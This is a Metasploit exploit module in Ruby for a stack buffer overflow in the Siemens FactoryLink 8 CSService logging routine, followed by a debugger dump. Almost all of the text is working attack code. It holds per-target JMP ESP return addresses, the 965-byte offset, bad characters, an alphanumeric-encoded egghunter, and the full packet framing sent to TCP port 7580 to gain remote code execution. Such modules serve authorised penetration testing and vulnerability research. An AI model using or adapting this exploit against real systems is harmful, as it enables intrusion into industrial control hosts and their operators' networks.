##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for a stack-based buffer overflow in the Siemens FactoryLink 8
  # CSService.exe logging routine (an unbounded vsprintf of the Path parameter of a
  # CSMSG_ListFiles_REQ message; see the debugger dump at the end of the file).
  # One TCP request to the CSService port (7580 by default) carries the oversized
  # Path. The saved return address sits at offset 965 of the narrow buffer and is
  # replaced with a JMP ESP address in USER32.dll, so the listed 'Ret' values are
  # specific to the exact OS builds named in 'Targets'.
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Egghunter

  # Module metadata. The 'Payload' constraints are the part that matters for the
  # rest of the module: the bad-character list (presumably bytes that the
  # CodePage-0 ANSI conversion described below does not preserve -- TODO confirm)
  # and the AlphanumMixed encoder with ECX as its buffer register, which the stub
  # at the top of #exploit sets up.
  #
  # @param info [Hash] base module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found on Siemens FactoryLink 8. The
          vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,
          the user-supplied path first gets converted to ANSI format (CodePage 0), and then
          gets handled by a logging routine where proper bounds checking is not done,
          therefore causing a stack-based buffer overflow, and results arbitrary code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Luigi Auriemma <aluigi[at]autistici.org>', # Initial discovery, poc
          'sinn3r', # Metasploit (thx hal)
        ],
        'References' => [
          ['OSVDB', '72812'],
          ['URL', 'http://aluigi.altervista.org/adv/factorylink_1-adv.txt'],
          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01']
        ],
        'Payload' => {
          'BadChars' => "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },
        },
        'DefaultOptions' => {
          'EXITFUNC' => "process",
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP3',
            {
              'Offset' => 965, # Offset to overwrite RETN
              'Ret' => 0x7e4456f7, # JMP ESP in USER32.dll
              'Max' => 1400, # Max buffer used
            }
          ],
          [
            'Windows Server 2003 SP0',
            {
              'Offset' => 965,
              'Ret' => 0x77d20738, # JMP ESP in USER32.dll
              'Max' => 1400,
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-03-25',
        # Reliability, stability and side effects were never characterised for
        # this module; the UNKNOWN_* markers are deliberate.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # CSService listens on TCP 7580 by default; the only tunable beyond the
    # standard Tcp mixin options.
    register_options(
      [
        Opt::RPORT(7580)
      ]
    )
  end

  # User input will get converted back to ANSI with WideCharToMultiByte before vsprintf
  #
  # Widens a narrow string to UTF-16LE style by appending a NUL byte after every
  # character, so that the service's ANSI conversion yields the original bytes
  # again (apart from the 'BadChars' declared above).
  #
  # @param text [String] narrow string to widen
  # @return [String] the input with "\x00" interleaved after each character
  def to_unicode(text)
    output = ''
    (text.length).times do |i|
      output << text[i, 1] << "\x00"
    end
    return output
  end

  # Builds and sends a single CSMSG_ListFiles_REQ whose Path field overflows the
  # logging buffer. Narrow-buffer layout before #to_unicode doubles it
  # (target['Max'] = 1400 bytes):
  #   [4 NOPs][stub + encoded payload][alpha padding up to 965][Ret][egghunter][padding]
  def exploit
    # Modify payload
    # XP = Align EAX 0x3a bytes. Win2k3SP0 = 0x0a bytes
    # The stub copies EDI into ECX and adjusts CL by a target-specific amount,
    # presumably so ECX points at the alphanumeric decoder that follows; ECX is
    # the 'BufferRegister' declared in 'EncoderOptions' above.
    p = "\x57" # PUSH EDI
    p << "\x59" # POP ECX
    p << ((target.name =~ /server 2003/i) ? "\xb0\x0a" : "\xb0\x3a") # MOV AL, imm8 (per-target adjustment)
    p << "\x30\xc1" # XOR CL,AL
    p << payload.encoded

    # Meterpreter tends to fail because of it being mangled. We use an egghunter
    # instead to ensure the payload's integrity.
    egg_options =
      {
        :checksum => true,
        :eggtag => "W00T",
      }

    # Egghunter mixin: first value is the hunter stub, second is the payload with
    # the egg tag prepended (mixin convention). The tag "W00T" and the checksum
    # travel through the same ANSI round-trip as the rest of the buffer.
    egghunter, p = generate_egghunter(p, payload_badchars, egg_options)

    # x86/alpha_mixed egghunter
    # The hunter is re-encoded alphanumerically with ESP as its buffer register
    # because it sits immediately after the return address in the buffer, which
    # the JMP ESP 'Ret' transfers control to.
    alpha_encoder = framework.encoders.create("x86/alpha_mixed")
    alpha_encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
    egghunter = alpha_encoder.encode(egghunter, nil, nil, platform)

    sploit = ''
    sploit << make_nops(4)
    sploit << p
    # NOTE(review): 965 is hard-coded here although both targets declare the same
    # value as target['Offset']; the two must stay in sync.
    sploit << rand_text_alpha(965 - sploit.length)
    sploit << [target.ret].pack('V*') # return address, little-endian
    sploit << egghunter

    sploit << rand_text_alpha(target['Max'] - sploit.length)
    sploit = to_unicode(sploit)

    # Fixed CSMSG_ListFiles_REQ framing around the widened Path; bytes 2..4 of the
    # header are the ASCII tag "LEN". The remaining header fields are not decoded
    # here.
    pkt = "\x00\x00\x4c\x45\x4e\x00\x40\x0b\x00\x00\x00\x00\x00\x00\x99\x00\x00\x00\x04\x00"
    pkt << "\x00\x00\x01\x07\x00\x00\x0b\x31\x99\x62\x72\x6b\x01\x00\x00\x00\x02\x04\x00\x00"
    pkt << "\x00\x04\x00\x00\x00\x01\x07\x00\x00\x0b\x19\x99\x00\x00\x00\x06\x00\x00\x00\x03"
    pkt << "\x06\x00\x00\x0a\xf6\x11\x22\x33\x44"
    pkt << sploit
    pkt << "\x00\x00\x06\x00\x00\x00\x06\x11\x22\x33\x44\x00\x00\x04\x00\x00\x00\x04\x00\x00"
    pkt << "\x00\x01\x99\x99\x99"

    print_status("Sending malicious request to remote host...")

    connect
    sock.put(pkt)
    handler
    # Kernel#select with only a timeout: a 6-second pause before the socket is
    # torn down.
    select(nil, nil, nil, 6)
    disconnect
  end
end
=begin
0:000> g
call vsprintf. Destination=0x0012ead0 Format=0x0043b92c Args=0x0012eedc
eax=0012eedc ebx=7c809a99 ecx=0043b92c edx=0012ead0 esi=0012eee8 edi=00000002
eip=0040b908 esp=0012eac4 ebp=0012fabc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
CSService+0xb908:
0040b908 ff15249b4400 call dword ptr [CSService+0x49b24 (00449b24)] ds:0023:00449b24={msvcrt!vsprintf (77c3fe49)}
149
0:000> dc 0012ead0
150
0012ead0 65535343 63697672 43203a65 47534d53 CSService: CSMSG
151
0012eae0 73694c5f 6c694674 525f7365 2d205145 _ListFiles_REQ -
152
0012eaf0 6f685320 72694477 2c303d73 6c694620 ShowDirs=0, Fil
153
0012eb00 3d726574 6150202c 613d6874 61616161 ter=, Path=aaaaa
154
0012eb10 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
155
0012eb20 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
156
0012eb30 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
157
0012eb40 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
158
159
=end